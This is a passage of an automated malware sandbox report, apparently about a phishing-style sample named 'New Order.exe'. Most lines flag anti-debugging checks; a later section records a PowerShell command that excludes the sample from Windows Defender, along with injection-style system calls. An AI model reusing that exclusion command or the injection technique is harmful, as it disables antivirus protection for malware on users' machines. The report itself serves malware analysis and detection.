                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842750 mov eax, dword ptr fs:[00000030h]8_2_01842750
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188E75D mov eax, dword ptr fs:[00000030h]8_2_0188E75D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01884755 mov eax, dword ptr fs:[00000030h]8_2_01884755
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808770 mov eax, dword ptr fs:[00000030h]8_2_01808770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804690 mov eax, dword ptr fs:[00000030h]8_2_01804690
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804690 mov eax, dword ptr fs:[00000030h]8_2_01804690
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C6A6 mov eax, dword ptr fs:[00000030h]8_2_0183C6A6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018366B0 mov eax, dword ptr fs:[00000030h]8_2_018366B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0183A6C7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A6C7 mov eax, dword ptr fs:[00000030h]8_2_0183A6C7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018806F1 mov eax, dword ptr fs:[00000030h]8_2_018806F1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018806F1 mov eax, dword ptr fs:[00000030h]8_2_018806F1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E609 mov eax, dword ptr fs:[00000030h]8_2_0187E609
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842619 mov eax, dword ptr fs:[00000030h]8_2_01842619
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01836620 mov eax, dword ptr fs:[00000030h]8_2_01836620
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838620 mov eax, dword ptr fs:[00000030h]8_2_01838620
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E627 mov eax, dword ptr fs:[00000030h]8_2_0181E627
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180262C mov eax, dword ptr fs:[00000030h]8_2_0180262C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181C640 mov eax, dword ptr fs:[00000030h]8_2_0181C640
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C866E mov eax, dword ptr fs:[00000030h]8_2_018C866E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C866E mov eax, dword ptr fs:[00000030h]8_2_018C866E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A660 mov eax, dword ptr fs:[00000030h]8_2_0183A660
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A660 mov eax, dword ptr fs:[00000030h]8_2_0183A660
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01832674 mov eax, dword ptr fs:[00000030h]8_2_01832674
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A0 mov eax, dword ptr fs:[00000030h]8_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018009AD mov eax, dword ptr fs:[00000030h]8_2_018009AD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018009AD mov eax, dword ptr fs:[00000030h]8_2_018009AD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018889B3 mov esi, dword ptr fs:[00000030h]8_2_018889B3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018889B3 mov eax, dword ptr fs:[00000030h]8_2_018889B3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018889B3 mov eax, dword ptr fs:[00000030h]8_2_018889B3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018969C0 mov eax, dword ptr fs:[00000030h]8_2_018969C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A9D0 mov eax, dword ptr fs:[00000030h]8_2_0180A9D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A9D0 mov eax, dword ptr fs:[00000030h]8_2_0180A9D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A9D0 mov eax, dword ptr fs:[00000030h]8_2_0180A9D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A9D0 mov eax, dword ptr fs:[00000030h]8_2_0180A9D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A9D0 mov eax, dword ptr fs:[00000030h]8_2_0180A9D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A9D0 mov eax, dword ptr fs:[00000030h]8_2_0180A9D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018349D0 mov eax, dword ptr fs:[00000030h]8_2_018349D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CA9D3 mov eax, dword ptr fs:[00000030h]8_2_018CA9D3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8918 mov eax, dword ptr fs:[00000030h]8_2_017F8918
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8918 mov eax, dword ptr fs:[00000030h]8_2_017F8918
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188E9E0 mov eax, dword ptr fs:[00000030h]8_2_0188E9E0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018329F9 mov eax, dword ptr fs:[00000030h]8_2_018329F9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018329F9 mov eax, dword ptr fs:[00000030h]8_2_018329F9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E908 mov eax, dword ptr fs:[00000030h]8_2_0187E908
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E908 mov eax, dword ptr fs:[00000030h]8_2_0187E908
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188C912 mov eax, dword ptr fs:[00000030h]8_2_0188C912
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188892A mov eax, dword ptr fs:[00000030h]8_2_0188892A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0189892B mov eax, dword ptr fs:[00000030h]8_2_0189892B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01880946 mov eax, dword ptr fs:[00000030h]8_2_01880946
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01826962 mov eax, dword ptr fs:[00000030h]8_2_01826962
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01826962 mov eax, dword ptr fs:[00000030h]8_2_01826962
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01826962 mov eax, dword ptr fs:[00000030h]8_2_01826962
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0184096E mov eax, dword ptr fs:[00000030h]8_2_0184096E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0184096E mov edx, dword ptr fs:[00000030h]8_2_0184096E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0184096E mov eax, dword ptr fs:[00000030h]8_2_0184096E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A4978 mov eax, dword ptr fs:[00000030h]8_2_018A4978
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A4978 mov eax, dword ptr fs:[00000030h]8_2_018A4978
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188C97C mov eax, dword ptr fs:[00000030h]8_2_0188C97C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800887 mov eax, dword ptr fs:[00000030h]8_2_01800887
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188C89D mov eax, dword ptr fs:[00000030h]8_2_0188C89D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E8C0 mov eax, dword ptr fs:[00000030h]8_2_0182E8C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D08C0 mov eax, dword ptr fs:[00000030h]8_2_018D08C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CA8E4 mov eax, dword ptr fs:[00000030h]8_2_018CA8E4
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C8F9 mov eax, dword ptr fs:[00000030h]8_2_0183C8F9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C8F9 mov eax, dword ptr fs:[00000030h]8_2_0183C8F9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188C810 mov eax, dword ptr fs:[00000030h]8_2_0188C810
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A483A mov eax, dword ptr fs:[00000030h]8_2_018A483A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A483A mov eax, dword ptr fs:[00000030h]8_2_018A483A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A830 mov eax, dword ptr fs:[00000030h]8_2_0183A830
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01822835 mov eax, dword ptr fs:[00000030h]8_2_01822835
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01822835 mov eax, dword ptr fs:[00000030h]8_2_01822835
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01822835 mov eax, dword ptr fs:[00000030h]8_2_01822835
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01822835 mov ecx, dword ptr fs:[00000030h]8_2_01822835
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01822835 mov eax, dword ptr fs:[00000030h]8_2_01822835
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01822835 mov eax, dword ptr fs:[00000030h]8_2_01822835
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01812840 mov ecx, dword ptr fs:[00000030h]8_2_01812840
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01830854 mov eax, dword ptr fs:[00000030h]8_2_01830854
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804859 mov eax, dword ptr fs:[00000030h]8_2_01804859
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804859 mov eax, dword ptr fs:[00000030h]8_2_01804859
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01896870 mov eax, dword ptr fs:[00000030h]8_2_01896870
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01896870 mov eax, dword ptr fs:[00000030h]8_2_01896870
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188E872 mov eax, dword ptr fs:[00000030h]8_2_0188E872
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188E872 mov eax, dword ptr fs:[00000030h]8_2_0188E872
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FCB7E mov eax, dword ptr fs:[00000030h]8_2_017FCB7E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B4BB0 mov eax, dword ptr fs:[00000030h]8_2_018B4BB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B4BB0 mov eax, dword ptr fs:[00000030h]8_2_018B4BB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810BBE mov eax, dword ptr fs:[00000030h]8_2_01810BBE
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810BBE mov eax, dword ptr fs:[00000030h]8_2_01810BBE
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01820BCB mov eax, dword ptr fs:[00000030h]8_2_01820BCB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01820BCB mov eax, dword ptr fs:[00000030h]8_2_01820BCB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01820BCB mov eax, dword ptr fs:[00000030h]8_2_01820BCB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800BCD mov eax, dword ptr fs:[00000030h]8_2_01800BCD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800BCD mov eax, dword ptr fs:[00000030h]8_2_01800BCD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800BCD mov eax, dword ptr fs:[00000030h]8_2_01800BCD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AEBD0 mov eax, dword ptr fs:[00000030h]8_2_018AEBD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808BF0 mov eax, dword ptr fs:[00000030h]8_2_01808BF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808BF0 mov eax, dword ptr fs:[00000030h]8_2_01808BF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808BF0 mov eax, dword ptr fs:[00000030h]8_2_01808BF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188CBF0 mov eax, dword ptr fs:[00000030h]8_2_0188CBF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182EBFC mov eax, dword ptr fs:[00000030h]8_2_0182EBFC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187EB1D mov eax, dword ptr fs:[00000030h]8_2_0187EB1D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182EB20 mov eax, dword ptr fs:[00000030h]8_2_0182EB20
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182EB20 mov eax, dword ptr fs:[00000030h]8_2_0182EB20
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C8B28 mov eax, dword ptr fs:[00000030h]8_2_018C8B28
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C8B28 mov eax, dword ptr fs:[00000030h]8_2_018C8B28
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B4B4B mov eax, dword ptr fs:[00000030h]8_2_018B4B4B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B4B4B mov eax, dword ptr fs:[00000030h]8_2_018B4B4B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A8B42 mov eax, dword ptr fs:[00000030h]8_2_018A8B42
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01896B40 mov eax, dword ptr fs:[00000030h]8_2_01896B40
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01896B40 mov eax, dword ptr fs:[00000030h]8_2_01896B40
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CAB40 mov eax, dword ptr fs:[00000030h]8_2_018CAB40
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AEB50 mov eax, dword ptr fs:[00000030h]8_2_018AEB50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA80 mov eax, dword ptr fs:[00000030h]8_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4A80 mov eax, dword ptr fs:[00000030h]8_2_018D4A80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838A90 mov edx, dword ptr fs:[00000030h]8_2_01838A90
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808AA0 mov eax, dword ptr fs:[00000030h]8_2_01808AA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808AA0 mov eax, dword ptr fs:[00000030h]8_2_01808AA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01856AA4 mov eax, dword ptr fs:[00000030h]8_2_01856AA4
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01856ACC mov eax, dword ptr fs:[00000030h]8_2_01856ACC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01856ACC mov eax, dword ptr fs:[00000030h]8_2_01856ACC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01856ACC mov eax, dword ptr fs:[00000030h]8_2_01856ACC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800AD0 mov eax, dword ptr fs:[00000030h]8_2_01800AD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01834AD0 mov eax, dword ptr fs:[00000030h]8_2_01834AD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01834AD0 mov eax, dword ptr fs:[00000030h]8_2_01834AD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183AAEE mov eax, dword ptr fs:[00000030h]8_2_0183AAEE
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183AAEE mov eax, dword ptr fs:[00000030h]8_2_0183AAEE
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188CA11 mov eax, dword ptr fs:[00000030h]8_2_0188CA11
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CA24 mov eax, dword ptr fs:[00000030h]8_2_0183CA24
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182EA2E mov eax, dword ptr fs:[00000030h]8_2_0182EA2E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01824A35 mov eax, dword ptr fs:[00000030h]8_2_01824A35
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01824A35 mov eax, dword ptr fs:[00000030h]8_2_01824A35
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CA38 mov eax, dword ptr fs:[00000030h]8_2_0183CA38
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806A50 mov eax, dword ptr fs:[00000030h]8_2_01806A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806A50 mov eax, dword ptr fs:[00000030h]8_2_01806A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806A50 mov eax, dword ptr fs:[00000030h]8_2_01806A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806A50 mov eax, dword ptr fs:[00000030h]8_2_01806A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806A50 mov eax, dword ptr fs:[00000030h]8_2_01806A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806A50 mov eax, dword ptr fs:[00000030h]8_2_01806A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806A50 mov eax, dword ptr fs:[00000030h]8_2_01806A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810A5B mov eax, dword ptr fs:[00000030h]8_2_01810A5B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810A5B mov eax, dword ptr fs:[00000030h]8_2_01810A5B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AEA60 mov eax, dword ptr fs:[00000030h]8_2_018AEA60
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CA6F mov eax, dword ptr fs:[00000030h]8_2_0183CA6F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CA6F mov eax, dword ptr fs:[00000030h]8_2_0183CA6F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CA6F mov eax, dword ptr fs:[00000030h]8_2_0183CA6F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187CA72 mov eax, dword ptr fs:[00000030h]8_2_0187CA72
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187CA72 mov eax, dword ptr fs:[00000030h]8_2_0187CA72
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4DAD mov eax, dword ptr fs:[00000030h]8_2_018D4DAD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C8DAE mov eax, dword ptr fs:[00000030h]8_2_018C8DAE
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C8DAE mov eax, dword ptr fs:[00000030h]8_2_018C8DAE
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01836DA0 mov eax, dword ptr fs:[00000030h]8_2_01836DA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CDB1 mov ecx, dword ptr fs:[00000030h]8_2_0183CDB1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CDB1 mov eax, dword ptr fs:[00000030h]8_2_0183CDB1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183CDB1 mov eax, dword ptr fs:[00000030h]8_2_0183CDB1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01828DBF mov eax, dword ptr fs:[00000030h]8_2_01828DBF
                Source: C:\Users\user\Desktop\New Order.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
